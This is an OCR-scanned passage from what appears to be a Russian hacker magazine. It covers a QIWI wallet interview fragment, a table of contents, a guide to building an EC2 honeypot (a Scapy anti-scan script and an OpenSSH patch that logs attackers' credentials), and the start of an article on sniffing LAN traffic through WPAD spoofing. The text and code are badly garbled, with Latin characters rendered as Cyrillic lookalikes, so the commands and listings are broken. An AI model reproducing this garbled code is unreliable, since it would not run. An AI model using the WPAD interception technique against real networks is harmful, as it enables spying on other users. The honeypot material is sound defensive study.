операторы, которые образовывались давным- 
давно, имеют очень старые биллинги или 
вообще не имеют платежных шлюзов для 
подключения к себе. Тарифы у многих строятся 
от номинала, который ты заплатил. Заплатил 
двадцатку — тебе дают 500 минут и 500 5М5. 

А наша концепция такова: любую сумму из 
кошелька ты можешь положить на счет. К при- 
меру, в Индии мы долгое время не запускались 
из-за подобного требования. 



ОІѴѴІ КОШЕЛЕК 



Еще в 2005 году мы создали компанию «Мо- 
бильный кошелек» и начали разрабатывать 
приложение. Нам было актуально приложение 
для дилеров. Сейчас у нас есть 18 типов точек 
приема платежей. Можно принимать плате- 
жи через точку, установленную на іРасі, на 
мобильнике, на ПК, на Р05'е, на кассе. Нужно 
любое устройство, на котором можно вводить 
данные, и место, где можно принимать деньги, 
а весь софт для этого у нас есть. 

Мы с самого начала понимали, что нужно 
делать личное пространство пользователя. 
Тогда бренд назывался «Мобильный коше- 
лек», был сайт тоЬѵѵ.ги. Мы начали потихоньку 
развивать это направление, посадили не- 
большую команду, которая над этим трудилась. 
К 2009-му стало ясно, что пора персонализиро- 
вать пользователя, регистрировать его, давать 
ему РІІМ-код. Коллектив, который занимался 
«Мобильным кошельком», мы переименовали 
в ОІѴѴІ Кошелек и начали развитие В2С — тех- 
нологии для пользователя. Создали хороший 
портал, приложения для ІРасі, іРЬопе и других 
мобильников. Стало ясно, что не зря в 2005 
году мы сделали на это ставку. 

На сегодня ОІѴѴІ Кошельком платят за те 
услуги, которые в терминале реализовать не- 
возможно. Если нужно заполнять больше двух 
полей, нужна технология, чтобы эти данные 
сохранялись, а потом их можно было поднять 
и на их основании осуществить платеж. 

ОІѴѴІ Кошелек в большинстве случаев 
обеспечивает банковский сервис. Погашение 
кредитов, пополнение счетов, пополнение карт, 
МазІегСагсІ МопеуБепсІ, Ѵіза Мопеу Тгапзіюг — 
люди активно всем этим пользуются. Если 
говорить о финансовых услугах, у нас есть ряд 
продуктов. Первый — ОІѴѴІ Ѵіза ѴИиаІ, это карта 
с фиксированным номиналом, трехмесячная. 
Второй продукт — ОІѴѴІ Ѵіза Сапі Карта дается 
на год: она без номинала и привязана к счету 
кошелька. Кроме того, несколько месяцев назад 
мы запустили продукт ОІѴѴІ Ѵіза Ріазііс. У нас на 
сайте за сто рублей ты можешь заказать пла- 
стиковую карту, и мы отправим ее почтой. Карта 
привязана к балансу кошелька. Плюс еще есть 
интернет-магазины. На сегодня у нас подключе- 
ны более 5000 интернет-магазинов. НС 
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31 страница на одной полосе. 
Тизер некоторых статей. 
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РС20МЕ 
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КАКУСТРОЕН 6006І.Е 

Думаю, мало кто в мире имеет полное 
представлениеотом, кактехнически 
устроен поисковый гигант. Только вду- 
майся в цифру: ежедневная аудитория 
боодіесоставляетоколо миллиарда 
человек! Чтобы обслужитьтакое 
количество пользователей, работает 
почти миллион серверов по всему миру. 
При этом инженерам боодіе постоянно 
удается оптимизировать работу системы: 
среднее время обработки запроса сейчас 
составляет каких-то 100 миллисекунд 
— а ведь в индексе поисковика более 
40 миллиардов страниц! О том, на какие 
ухищрения приходится идти компании и 
какиетехнологии для этого используют- 
ся, мы сегодня и поговорим. 




РС20ЫЕ 



ВЗЛОМ 






ХАНИПОТ НА АМА20Ы 




АТАКИ НА 0Ы5 
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Когда кто-то предлагает сервер 


62 


РИБ — это одна из основ современного 


68 




бесплатно, грехне воспользоваться 




интернета. Вспоминаем старые и 





предложением. Приспосабливаем такой разбираемся с новыми векторами атак 

хост для ловли свежих сплоитов! на эту основопол а тающую технологию. 



ПРОЩАЙ, ЛИРУШЕЧКА! 

История реального взлома, рассказы- 
вающая отом, что и в крупных порталах с 
большой опытной командой программи- 
стов бываютуязвимости. 



ВЗЛОМ 



МАШАКЕ 






ВЕСЕЛЫЕ ВЗЛОМЫ 




МАЛВАРЬУ АППАРАТА! 




72 


Пятьзабавныхисторий из практики 
одного авторитетного исследователя 


78 


Современная малварь вполне может 
использовать многопроцессорность, 


82 



безопасности веб-приложений — аппаратные особенности железа и 

Владимира Воронцова. даже виртуализацию. Как? 



ЯДРО ПОД УГРОЗОЙ 

Мы решили взять один из самых из- 
вестных способов проникновения в 
ядро ѴѴіпсІоѵѵз и посмотреть, как на это 
реагируют популярные антивирусы. 
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РС20ЫЕ 



Антон «Апі» Жуков (іНикоѵ.айгеаІ. хакер. ги) 





ПОДНИМАЕМ 
ЛОВУШКУ ДЛЯ 
ЧЕРВЕЙ И СПЛОИТОВ 
В ОБЛАКЕ 



В арсенале любой антивирусной компании есть 
большая сеть так называемых ханипотов — намеренно 
уязвимых машин, используемых для детектирования 
новых видов малвари. Мы тоже можем создать такую 
ловушку-приманку, попытавшись поймать приватный 
сплоит. Причем сделать ее абсолютно безопасно для 
себя, подняв ханипот в облаке. 
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Ханипот на Атагоп 
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Арріу Йиіе СЬапдез 



Настройка внешнего файрвола на Атаюп 



ЦЕЛЬ 

В марте МісгозоЙ выпустила патч и опубликовала бюллетень по 
безопасности М512-020, предупреждающий о критических уяз- 
вимостях в протоколе удаленного рабочего стола, потенциально 
влекущих за собой возможность удаленного выполнения кода. 

В Сети тогда начали появляться как фейковые, так и настоящие 
РоС, вызывающие на удаленной машине В5ой, и особенно резвые 
товарищи уже начали портировать эти скрипты в модуль для 
Меіазріоіі (сейчас он уже доступен). Это было интересное время, 
чтобы поднять свой ханипот и посмотреть на возможные атаки на 
РОР-сервис. И очень просто — достаточно открыть в файрволе 
порт 3389 и смотреть все, что на него приходит: если бы появился 
червь с боевой нагрузкой, то он вполне реально мог «отметиться» 
в наших логах. Но где взять сервер? У Аппагоп! 

БЕСПЛАТНЫЙ ДЕДИК 

Арсенал облачных сервисов довольно большой, но наиболее попу- 
лярны три из них: Атагоп Еіазііс Сотрите СІоисІ (сокращенно ЕС2) — 
технология, с помощью которой ты можешь запустить в «облаке» 
любое количество компьютеров с нужным тебе конфигом и операци- 
онной системой; Аппагоп Еіазііс ВІоск 5іоге (или ЕВ5) — технология 
виртуализации жесткого диска, с помощью которой можно создать 
виртуальный диск для своего виртуального сервера; Аппагоп 5ітрІе 
Біогаде Бегѵісе (или 53) — технология, предназначенная для хра- 
нения файлов, этакий бесконечный контейнер для файлов, которые 
при желании становятся доступными через веб. Нас прежде всего 
интересует ЕС2, позволяющий создать виртуальный сервер. «Но за 
это же надо платить!» — возможно, резонно заметишь ты. Однако я 
не сказал о самом привлекательном. Аппагоп в рамках акции АѴѴ5 
Ргее ІІзаде Тіег предоставляет возможность «потрогать облака» 
бесплатно. Конечно, на бесплатную версию накладываются опреде- 
ленные ограничения: ежемесячно пользователям предоставляется 
750 часов использования инстанса ЕС2, 10 Гб для ЕВ5 и 5 Гб для 
53. Этих ресурсов вполне хватит, чтобы поднять свой собственный 
забугорный выделенный сервер. Мы, кстати, это уже использовали, 
когда поднимали на ЕС2 свой собственный ѴРІ\І. Тогда же мы более 
подробно рассказывали о технологиях Аппагоп, поэтому рекомендую 
прочитать статью «Бесплатный ѴРЫ от Аппагоп» (][ #1 2011). 

Зарегистрироваться и получить доступ к облачным серви- 
сам можно по следующему адресу: аѵуз.атагоп.сот . Нажимаем 
кнопку « 5 і д п ир поѵѵ», на странице регистрации выбираем «I ат 
а пеѵѵ изег» и пошагово выполняем процедуру создания и вери- 



фикации аккаунта. Единственно, что для успешной регистрации 
потребуется пластиковая карта (Ѵіза или МазІегСагсІ). Если у тебя 
нет карты или ты по какой-то причине не хочешь ее задейство- 
вать, то можно без проблем приобрести виртуальную кредитную 
карту, например в терминалах ОІѴѴІ. На последнем шаге регистра- 
ции необходимо будет указать свой номер телефона, после чего 
система совершит автоматический дозвон и приятным женским 
голосом попросит ввести четырехзначный пин-код, который будет 
отображен на экране компьютера. После этого можно перейти 
к созданию и настройке сервера. 

СОЗДАЕМ И НАСТРАИВАЕМ СЕРВЕР 

Важное преимущество облачных сервисов перед обычным 
хостингом — возможность быстро, буквально в два клика под- 
нять новый сервер (или к примеру три десятка — без разницы). 
Как это выглядит? Заходим на сайт под созданным аккаунтом 
и открываем «Му Ассоипі / Сопзоіе -> АѴѴ5 Мападетепі сопзоіе». 
Там выбираем тип сервиса «Аппагоп ЕС2». Для создания серве- 
ра (в терминологии Аппагоп — іпзіапсе'а) нажимаем на кнопку 
«І_аипсЬ Іпзіапсе». После чего запускаем мастер настройки 
сервера. Аппагоп предлагает на выбор различные варианты ОС 
для установки. Образ с операционной системой называется АМІ 
(Аппагоп МасЫпе Ітаде), причем, помимо файлов самой систе- 
мы, в него может быть включен нужный софт (к примеру, АрасЬе, 
Му50І_, МетсасЬесІ и так далее), а также все необходимые файлы. 
Я для работы выбрал ІІЬипІи (имя образа — аті-ЬаЬа68сІЗ). На 
следующей вкладке важно установить тип инстанса — Місго 



ЕЖЕМЕСЯЧНО ВЫДЕЛЯЕТСЯ 
750 ЧАСОВ ИСПОЛЬЗОВАНИЯ 
ИНСТАНСА ЕС2. ЭТОГО ВПОЛНЕ 
ХВАТИТ, ЧТОБЫ ПОДНЯТЬ СВОЙ 
СОБСТВЕННЫЙ ЗАБУГОРНЫЙ 
СЕРВЕР БЕСПЛАТНО! 
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РС20ЫЕ 



ТЕПЕРЬ ПРИШЛО ВРЕМЯ 
ПОИГРАТЬ В ЗЛОУМЫШЛЕН- 
НИКОВ— ПОПРОБУЕМ 
ПОДОБРАТЬ ПАРОЛЬ 
К СОБСТВЕННОМУ СЕРВЕРУ 



Іпзіапсе, использование которого бесплатно в рамках временного 
предложения Аппагоп. Если выбрать сервер помощнее, придется 
платить за каждый час его использования. Дальше, в принци- 
пе, все можно оставлять по дефолту, нас будут интересовать 
только третий и четвертый шаг. На третьем шаге необходимо 
будет создать пару открытый/приватный ключ для авторизации 
на нашем сервере, а на четвертом нужно настроить правила 
файрвола, чтобы была возможность подключиться к хосту по 
55Н. Для этого надо в выпадающем списке «Сгеаіе а пеѵѵ г и I е » 
выбрать пункт «55Н» и нажать кнопку «АсІсІ Риіе». В результате 
мы получаем полноценный сервер с ІІЬипІи на борту. Самое время 
его запустить. Для этого в «АѴѴ5 Мападетепі Сопзоіе» выбираем 
пункт «Іпзіапсез», видим только что созданный нами инстанс. 
Кликаем по нему правой кнопкой и в появившемся контекстном 
меню нажимаем на «5іагІ». Как только в колонке «5іа1е» появит- 
ся значение «Риппіпд», это будет свидетельствовать о том, что 



сервер удачно запустился. В нижней части консоли на вкладке 
«Оезсгірііоп» можно посмотреть детальную информацию об 
инстансе. Параметр РиЫіс БІМ5 определяет внешнее имя сервера 
(правда, при каждом запуске инстанса он будет меняться). Чтобы 
при каждом подключении не лезть и не смотреть новое имя 
сервера, идем в раздел «Еіазііс ІРз» и задаем статический адрес. 
Нажимаем «АІІосаІе ІМеѵѵ АсІсі гезз», в появившемся окне выби- 
раем «ЕІР изесі іп» равное ЕС2 и нажимаем «Уез, АІІосаІе». Адрес 
выделен, теперь надо связать его с инстансом - кликаем на нем 
правой кнопкой мыши и нажимаем «Аззосіаіе», в появившемся 
окне выбираем инстанс, для которого хотим установить этот 
адрес, и нажимаем «Уез, Аззосіаіе». После чего для подключения 
к серверу будет использоваться статический адрес. Попробуем 
подключиться к серверу через 55Н: 

ззіі -і апігзкеу.рет иЬип1=и@23.21.97.235 

Тут апізкеу.рет — пара ключей, которые были сгенери- 
рованы при создании инстанса, ибипіи — имя пользователя, 
а 23.21.97.235 — адрес инстанса. Если же ты хочешь подключить- 
ся из-под винды при помощи РиТТУ, то сначала придется скон- 
вертировать приватный ключ в ррк-формат при помощи утилиты 
РиТТУдеп. Для успешного подключения необходимо указать 
РиТТУ ІР-адрес инстанса и приватный ключ, после чего можно 
открывать соединение с удаленным сервером. 

ХАНИПОТ ДЛЯ М512-20 РйР 

Бесплатным дедиком мы обзавелись, осталось поднять на нем 
ханипот. 

Поскольку сервер у меня был на Ыпих'е, необходимо было под- 
нять непосредственно сервис РБР: 



ПРОТИВОДЕЙСТВИЕ СКАНИРОВАНИЮ ПОРТОВ 



А теперь мы немножечко коснемся того, как затруднить жизнь 
атакующему. Каждая атака на начальном этапе включает в себя 
изучение цели. В большинстве случаев злоумышленников 
интересуютустановленные сервисы, версия ОС, открытые порты. 

Всю эту информацию можно получить с помощью сканирования 
удаленной машины. Существуют инструменты, способные обнаружить 
сканирование портов и заблокировать атакующего, настроив 
соответствующим образом правила файрвола. Мы же пойдем от 
обратного и изобретем собственный велосипед для противодействия 
5УІ\І-сканированию (опция -з5 в птар). Данный тип сканирования 
работает следующим образом: атакующий отправляет5УІЧ-пакет на 
заданный порт, как если бы он хотел открыть соединение с удаленным 
хостом. Если удаленный хост отвечает БУИ/АСК-пакетом, то это означает, 
что порт открыт. Если в ответ приходит В5Т(Везеі)-пакет, то порт 
закрыт. Если же после нескольких передач от удаленного хоста так и не 
приходит ответа, то порт помечается какННегесі. Многие инструменты 
для противодействия сканированию просто блокируют атакующего, мы 
же поступим хитрее — создадим иллюзию, что у нас открыт любой порт, 
какой бы он ни просканировал. Для этого нам понадобится, во-первых, 
настроить на своем хосте файрвол, чтобы он блокировал все исходящие 
В5Т-пакеты, указывающие, что этот порт закрыт, во-вторых, написать 
небольшой скриптик, который вместо В5Т-пакетов будет отсылать 
поддельные 5УІЧ/АСК-пакеты, говорящие о том, что порт открыт. 

Итак, первым делом добавляем правило, блокирующее исходящие 
В5Т-пакеты: 

# зисіо ірІіаЫез -А ОШРШ -р 1=ср --Ітср-Ла^з К5Т К5Т -і РКОР 



Для дальнейших манипуляций нам понадобится установить Беару: 

# зисіо аріі-^еі: іпзііаіі ру1:Ііоп-5сару 

Беару — это сетевая утилита, написанная на языке РуНіоп, которая 
позволяет посылать, просматривать и анализировать сетевые пакеты. 

В отличие от многих других утилит, утилита Беару не ограничена только 
теми протоколами, пакеты которых она может генерировать. Фактически 
она позволяет создавать любые пакеты и комбинировать атаки 
различныхтипов. Запускаем: 

# зисіо зсару 

и говорим, чтобы он отлавливал все сетевые пакеты, пока их количество 
не будет равно соипі: 

>>> 5пі-Р-Р(соиітС=1) 

Если нужно анализировать отловленные пакеты, то можно поступить 
следующим образом: 

>>> р = 5пі-р-Р(с оип1==1ѲѲ^ 

Кактолько Беару перехватит 100 пакетов, можно будет их 
просмотреть/проанализировать. Например, следующая команда 
выводит краткую информацию по первым 20 пакетам: 

>>> р [0 : 19] .зиттагуО 
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Ханипот на Атагоп 



# зисіо арі-§е1: іпзіаіі хгсір 



В случае успешной установки РйР сервер должен автоматиче- 
ски запуститься. Проверить это можно следующим образом: 

# пе1=5І=а1= -ап | §гер 3389 

іср 0 0 0.0.0.0:3389 0.0. 0.0:* ІЛ5ТЕІМ 

Как видишь, сервер успешно стартанул на стандартном 
порту РйР (3389) и ждет подключений. Все это прекрасно, но 
Атагоп'овский файрвол режет все подключения к нашему серве- 
ру, кроме тех, что мы разрешим. Поэтому необходимо опять зайти 
в «АѴѴ5 Мападетепі Сопзоіе», выбрать пункт «Бесигііу бгоирз», вы- 
брать группу, в которой находится наш инстанс, и добавить правило, 
разрешающее подключаться по РйР к нашему серверу. Делается это 
опять же очень просто — достаточно выбрать в выпадающем списке 
РйР и кликнуть на «АсМ Риіе». Теперь порт 3389 на нашей машине 
открыт для внешних подключений. Осталось только приказать 
Арбитру сохранять все пакеты, отправляемые на этот порт: 

# зисіо Іісрсіитр Ііср рогЕ 3389 -і е1:И0 \ 

-ѵѵХ >> /Ьоте/иЬип1:и/гсІр1о^.1:х1: & 

Чтобы проверить, попробуем, к примеру, просканировать наш 
хост сканером птар: 

# птар -Т4 -А -ѵ 23.21.97.235 

Сканер сообщил, что обнаружил два открытых порта: 22 
и 3389. Отлично, теперь зайдем на сервер, посмотрим, попало ли 
что-нибудь в лог. Как видим, Ісрбитр превосходно справился со 




Лог, собранный ісрсіитр'ом 

своей работой, аккуратно сохранив все пакеты в лог-файл. Оста- 
ется перезапустить Ісрбитр и оставить сервер на ночь поработать, 
может быть, утром в логе обнаружится что-то интересное. Наутро 
ничего интересного не нашлось, и на следующее — тоже :). Очень 
скоро для Меіазріоіі появился работающий сплоит, который клал 
на лопатки виндовую систему, но, естественно, никто не пытался 
использовать его для создания червя. Я опробовал его на своем 
хосте — и это была первая запись в логе снифера, сохранившая 
боевую нагрузку. Появится ли сплоит с боевым применением, 
позволяющий выполнить код, — вопрос открытый. Мой ханипот 
по-прежнему активен и ждет своего часа :). 



Детальную информацию о каждом пакете можно посмотреть так: 

»> р[2].6з1: // адрес назначения 

>>> р[2] [ ЕІіКіег ] // Е1=Ьегпе1= кадр 

»> Р[2][ІР] // заголовок ІР-пакета и содержимое 

В общем, если хочешь попробовать все возможности инструмента — 
почитай документацию на официальном сайте, мы же их подробно 
рассматривать не будем. Наша задача — написать простенький 
скриптик, использующий Беару, который будет сообщать атакующему, 
что каждый просканированный порт является открытым. Приступим. 
Создаем файл для редактирования: 



я папо аптізсап.рѵ 
и пишем следующий код: 




#! /изг/Ьіп/епѵ оѵ1:Ііоп 




ітрогі: зуз 


Тгот зсару.аіі ітрогі: * 




сІеТ бпсІ5ѴІМ(р) : 


Паев = о . зогіпіТГ "%ТСР . ■Па25%" } 


ІТ Па§з == "5" : 


# отвечаем только на 5ѴІ\І-пакеты 


ір = р[ІР] 


# полученный ІР-пакет 


гер = Р[ТСР] 


# полѵченный ТСР-сегмент 


і = ІРП 


# отправляемый ІР-пакет 


і.сізі: = ір.зге 



_і_. зге = ір.сізі: 

1: = ТСРО # отправляемый ТСР-сегмент 

1:.Па§5 = "5А" 

1: . сірогі: = ’Ьср.Брог'Ь 
і.зрогі: = іср.сірогі: 

1: . зец Ііср.аск 
пем_аск = іер.зед + 1 



ргіпі: "5УІМ/АСК зепі: Ііо " .і.сізі:. " : " .і.сірогі: 
зепсКіАС) 



з п і -р-р ( р г п =б п сі 5У N ) 

Принцип работы скрипта прост — разбираем полученный БѴІМ-пакет 
и конструируем ответ, сообщающий, что данный порт открыт. Скрипт 
готов, делаем его исполняемым и запускаем: 

# сбтосі +х апіізсап.ру 

# зисіо /Ііоте/иЬип1:и/ап1:І5сап. ру 

Перед тем как перейти к сканированию нашего хоста, необходимо 
добавить три правила в Бесигііу-Сгоир для нашего инстанса — АІІТСР, АН 
ІШР, АН ІСМР. Теперь можно запускать сканирование: 

# птар -Т4 -А -ѵ 23.21.97.235 

После чего видим, что сканер обнаружил огромное число открытых 
портов. Значит, мы добились своей цели. 
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ТЮНИМ 55Н ДЛЯ БОРЬБЫ С БРУТФОРСОМ 

Разумеется, ханипот можно заточить под самые разные задачи. 

Не секрет, что немало людей по всему миру сканируют подсети 
и пытаются сбрутить пароли для подключения к дедикам. В том 
числе по протоколу 55Н. Бороться с этим можно разными спосо- 
бами: разрешать подключение только с определенных адресов, 
блокировать атакующего с помощью файрвола после нескольких 
неудачных попыток залогиниться и так далее. У нас же абсо- 
лютно противоположная задача — мы предоставим атакующему 
фейковый 55Н, который будет записывать в лог передаваемую 
им информацию (адрес атакующего, имя пользователя для под- 
ключения, пароль). Начнем мы с того, что перенесем нормальный 
55Н-сервер на другой порт. Пусть это будет порт 2222. 

# 511СІО ср /еІс/ЗЗН/ЗЗНсІ СОПб^ \ 

/е^с/ззИззЫсопб^. Ьак2 

# 5іісіо папо /е1:с/55Іі/55ІісІ сопб^ 

Сначала делаем бэкап конфигурационного файла 55бс1_сопПд, 
затем открываем его в редакторе папо. Ищем строку «Рог* 

22» и меняем ее на «Рог* 2222». Теперь надо ребутнуть сервер. 
Сделать это можно из «АѴѴ5 Мападетепі Сопзоіе». Теперь если 
попробовать подключиться к 55Н на 22-м порту, то получим со- 
общение об ошибке «ІЧеІѵѵогк еггог: Соппесііоп геішзесі». Логично: 
55Н-сервер слушает совсем другой порт. Однако перед тем как 
подключиться к ББН-серверу на порту 2222, необходимо опять 
поднастроить файрвол Атагоп'а. Создаем новое правило «Сизіот 
ТСР гиіе», указываем «Рог* гапде» равным 2222, а «Боигсе» 
оставляем по умолчанию равным 0.0. 0.0/0. Добавляем правило 
и нажимаем «Арріу Риіе СЬапдез». После чего легко коннектимся 
к серверу по 55Н. Теперь займемся созданием ББН-сервера, ко- 
торый будет сохранять информацию, передаваемую атакующим. 
Нам потребуются исходники ОрепББН, компилятор 6СС, утилита 
таке, библиотеки ІіЬззІ-сІеѵ и 2 ІІЫ д-сіеѵ. 

# біісіо арі-деі: ирсіаіе 

# зисіо арі-§е1і іпзііаіі ІіЬззІ-сІеѵ 

# зисіо арі-%е1 і іпзііаіі 2 ІіЬ 1 §-сІеѵ 

# зисіо ар1і-§е1і іпзііаіі таке 

# зисіо арі-^еі іпзііаіі §сс 

# м§е1і Ыііір: //орепЬзсІ.оп^.аг/Х 
риЬ/ОрепВ5Р/Ореп55Н/роп1іаЫе/\ 
орепззІі-5.9р1.1іаг .§2 

# іаг ХѴ 2 -Р орепззІі-5.9р1.1іаг.§2 

# ссі орепззб-5.9р1 

# ./сопб§иге 

# таке 



Устанавливаем необходимые библиотеки, компилятор, 
скачиваем исходники ОрепББН, распаковываем и компилируем. 
Компиляция проходитуспешно, теперь надо запустить получен- 
ный сервер. Но перед этим разберемся с конфигурационными 
файлами. Скопируем ззЬсІ сопіід в папку /изг/іосаі/еіс: 

# зисіо ср 55М_сопб§ /изг/іосаі/еііс 

Открываем и правим: 

# зисіо папо /изг/1оса1/е1іс/55ІісІ_сопб§ 

Параметр Рог* устанавливаем в значение 22, чтобы наш 
поддельный сервер использовал дефолтный порт; включаем воз- 
можность аутентификации по паролю — «РаззѵѵогсІАиіЬепІісаІіоп 
уез»; отключаем опцию ІІзеРАМ, закомментировав ее, так как 
мы собрали ОрепББН без поддержки РАМ; сохраняем и выходим. 
Запускаем сервер, предварительно создав необходимую ему 
директорию /ѵаг/етріу: 

# зисіо тксііг /ѵаг/етрііу 

# зисіо /Ііоте/иЬип1іи/ореп55Іі-5.9р1/55ІісІ 

Чтобы убедиться, что сервер успешно запущен, поищем его 
в списке процессов: 

# рз аих | §гер ззМ 

В списке процессов фигурируют два ззбсі: /изг/зЬіп/ззЬсІ, запу- 
щенный системой, и /Ьоте/иЬип1и/ореп5зЬ-5.9р1/5зЬсІ, запущен- 
ный нами вручную. Команда 

# пеіізііаіі -ап | §гер 22 

покажет, что запущенные серверы слушают порты 22 и 2222. 
Теперь надо научить наш ББН-сервер сохранять данные, пере- 
даваемые атакующим. Убиваем запущенный нами сервер и идем 
в папку с сорцами. Нас интересует один файл, в котором проис- 
ходит проверка введенного пароля, — это аиіЬ-раззѵѵсІ.с. Реко- 
мендую, прежде чем проводить с ним какие-либо манипуляции, 
создать его резервную копию. Итак, открываем исходный файл 
для редактирования. Первое, что потребуется сделать, — это под- 
ключить еще один заголовочный файл: #іпс1исІе "сапоМозІ: . И". 
После чего пролистываем код немного ниже и видим функцию 
аиіЬ_раззѵѵогсІ. Она-то как раз нам и нужна. Слегка модифициру- 
ем ее. Сразу после строки «іпі гезиііі, ок = аиіІіс1:х1»ѵа1ісІ;» 
вставим приведенный ниже код: 




Патчим 55Н для сохранения информации озлоумышленнике 




Зашкаливающее число попыток подобрать пароль к 55Н 
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Ханипот на Атагоп 
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Пытаемся проэксплуатировать уязвимость в протоколе КОР на нашем сервере 



і-р ( *раззіл/огс1 != ' \Ѳ') 

і_ 

Бѣгисі: іт ИітеРІіг ; 
іітеі: ІосаІТіте; 
сііаг 1:іте51:гіп^[1Ѳ0] ; 



ІосаІТіте = ’ЕітеГши.); 

іітеРіг = 1оса11:іте(&1оса1Тіте); 

5і:г-Рі:іте(і:іте5і:гіп§ л 100., "%0 %г" } іітеРіг); 



РНЕ * 1оеГі1е: 

Іо^РіІе = Тореп("/ѵаг/1о^/55ІісІ_а1:1:етр1:5" . "а+" ); 

-рргіпіі-р (Іо^РіІе. "Ргот: %з аі: %5 | изег: %з. разз: %з\п". 
§еі_гето1:е_ірасІсІг()., ііте51:гіп§., аи1:11с1:х1:->и5ег л 
раззмогсі); 

■Рсіозе (1о§Рі1е ) ; 

Ь_ 



Как видно из листинга, если пароль не пуст, то мы сохраняем 
в файл /ѵаг/Іод/55ІісІ_аиетрІ5 адрес атакующего, имя пользователя, 
используемое для подключения, и пароль. Сохраняем измененный 
файл и заново собираем 0реп55Н при помощи утилиты таке. Ну что 
ж, теперь все готово, запускаем наш пропатченный сервер: 



# зисіо /Ііоте/иЬип1:и/ореп55І і -5.9р1/55ІісІ 
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Злоумышленник видит, что все порты открыты 

; Теперь пришло время поиграть в злоумышленников — по- 

і пробуем подобрать пароль к собственному серверу. Запускаем 
і еще один экземпляр РиТТѴ, вводим адрес сервера (23.21.97.235) 
і и соединяемся. Нам предлагают ввести логин, пусть это будет 
гооС А дальше надо угадать пароль для него :). Вручную подби- 
рать пароль надоедает быстро, так что пойдем лучше проверим, 
что у нас появилось в логе. А в логе появились записи вида: 

Ргот : 72.241.54.74 аі: 03/27/12 11:33:58 АМ_| изег: 
і гооі:, разз: ІТ 

і Как видишь, все прекрасно работает. Единственно, если сейчас 

просканировать сервер, то сканер покажеттри открытых порта — 
22, 2222, 3389. Чтобы порт 2222 не вызывал лишних подозрений, 
его можно временно закрыть амазоновским файрволом. 

! ЗАКЛЮЧЕНИЕ 

і Как видишь, поднять собственный ханипот не так уж сложно, 

і Нужно лишь немного терпения и хороший сервер. В качестве 

і площадки для экспериментов отлично себя зарекомендовал 

сервис Еіазііс Сотрите СІоисІ от Атагоп. Во-первых, такой 
сервер очень быстро создается; во-вторых, на нем нет никаких 
важных данных и его не жалко; в-третьих, он пока бесплатен. 
Сама же тема создания ханипотов достаточно обширная, и я ре- 
і комендую продолжить эксперименты, вооружившись специали- 

і зированной утилитой ЬопеусІ. □С 







УДОБНОЕ УПРАВЛЕНИЕ ЕС2 


Веб-консоль для управления АѴѴ5 хотя и предоставляет 
все необходимое, не всегда удобна. Для более комфортной 
работы лучше установить специальный плагин Еіазііс^ох для 
Ріге^ох. Настройка аддона сводится куказанию в настройках 


полученных во время регистрации АѴѴ5 Ассезз Кеу и АѴѴ5 
Зесгеі Ассезз Кеу. Помимо этого, сам Атагоп предоставляет 
набор консольных утилит (зЗ.атаіопаѵѵз.сот/есЗ-сІоѵѵпІоасІз/ 

ес2-аоМооІз.2Іо) для взаимодействия с ЕС2. 



ей 

На диске выложены 
необходимые файлы 
для работы с АѴѴ5. 



ІШП 

Подробная 
информация о М512- 

20: ЬіІ.Іу/АОІсАб. 
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агез (НирѴ/зпіН.зи) 



Казалось бы, что еще можно в наши 
дни придумать в области перехвата 
трафика и атак типа тап-іп-ібе-тісісііе? 
О том, что такое АРР роізоп, знает почти 
каждый. Более опытные товарищи 
использовали перехват через БНСР или 
ІСМР Ресіігесі. Однако есть в закромах 
искушенных «нюхачей» еще одна атака. 
Даже если кто-то о ней и слышал, 
то уж точно ее не использовал. Речь 
идет об атаке через протокол ѴѴРАй, 
которая позволяет успешно заниматься 
шпионажем в локальных сетях. 
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СНИФАЕ 



ТРАФИК 

ЧЕРЕЗ 
ѴѴРАР 



НОВАЯ ВОЗМОЖНОСТЬ 
ІЫТЕКСЕРТЕК-НО ДЛЯ 
ПЕРЕХВАТА СЕТЕВОГО 
ТРАФИКА 





Снифаем трафик через ѴѴ РАО 



ЧТО ТАКОЕ ѴѴРАй? 

Немного теории. Есть такой протокол ѴѴРАй (ѴѴеЬ Ргоху Аиіо- 
Оізсоѵегу): он отвечает за автоматическое получение настроек 
прокси в локальной сети и поддерживается практически всеми веб- 
браузерами и рядом других сетевых приложений. Наверняка каждый 
из вас видел галочку «Автоматическое определение параметров» 
в разделе сетевых настроек того же ІЕ. Так уж сложилось, что в ре- 
альности данный протокол очень редко используется и присутствует 
в браузерах просто как дополнительный функционал (кстати, в Орега 
все еще нет полной поддержки ѴѴРАй, хотя ІЕ научился с ним рабо- 
тать еще в 1999 году]. 

Вкратце суть работы этого протокола такова: если клиент 
использует йНСР для получения ІР-адреса в сети, то и за урлом 
с настройкой прокси он обращается к своему йНСР-серверу. Если 
йНСР не настроен на выдачу ѴѴРАО-конфигурации или в сети не 
используется йНСР как таковой, то клиент пробует разрешить 
сетевое имя вида ѵѵрасі.іосаісіотаіп, используя 0І\І5. В случае 
присутствия поддоменов вида бер2.ЬгапсЬ1.Пгт.сот будут пере- 
бираться урлы вида ѵѵра(ібер2.ЬгапсМ.Ягт.сот, ѵѵрасІ.ЬгапсМ. 
Лгт.сот, ѵѵрасІ.Пгт.сот и, в конечном счете, сам ѵѵрасі.сот — что 
очень и очень небезопасно, потому что владелец такого домена 
в интернете сможет повлиять на работу внутренней сети. Если имя 
не найдено и через 0І\І5, то делается последняя попытка поис- 
ка имени «ѴѴРАй» — через І\ІеіВІ05. В случае очередной неудачи 
клиент пробует выполнить соединение напрямую. Но если кто-то 



в сети сказал, что он имеет имя «ѴѴРАй», то клиент соединяется по 
80-му порту на ІР ответившего хоста и затем пытается загрузить 
файл ѵѵрасЫаІ, в котором должны находиться настройки прок- 
си. Эта схема работы ѴѴРАй описана стандартом, но на практике 
далеко не все браузеры и не всегда применяют йНСР или даже 
0І\І5-метод. В конечном счете самым основным способом поиска 
хоста с именем «ѴѴРАй» становится служба имен І\ІеіВІ05. И это 
корень уязвимости! 

ПОЧЕМУ ОН НЕБЕЗОПАСЕН? 

С самого начала своего существования ѴѴРАй стал брешью в без- 
опасности, потому что позволяет очень легко перехватить поток 
данных, выдавая клиентам сети собственную конфигурацию прокси- 
сервера. Простота вызвана тем, что І\ІеіВІ05-запрос разрешения 
имени является широковещательным и все компьютеры в сети могут 
как получить его, так и ответить на него. Именно это действие и есть 
ключ куспешному внедрению браузерам жертв наших собственных 
настроек прокси. Мы можем сообщить нужные нам настройки и пу- 
стить трафик через себя — проще простого! 

Однако, несмотря на кажущуюся простоту и долгий срок суще- 
ствования такой лазейки, атака все-таки не приобрела большой 
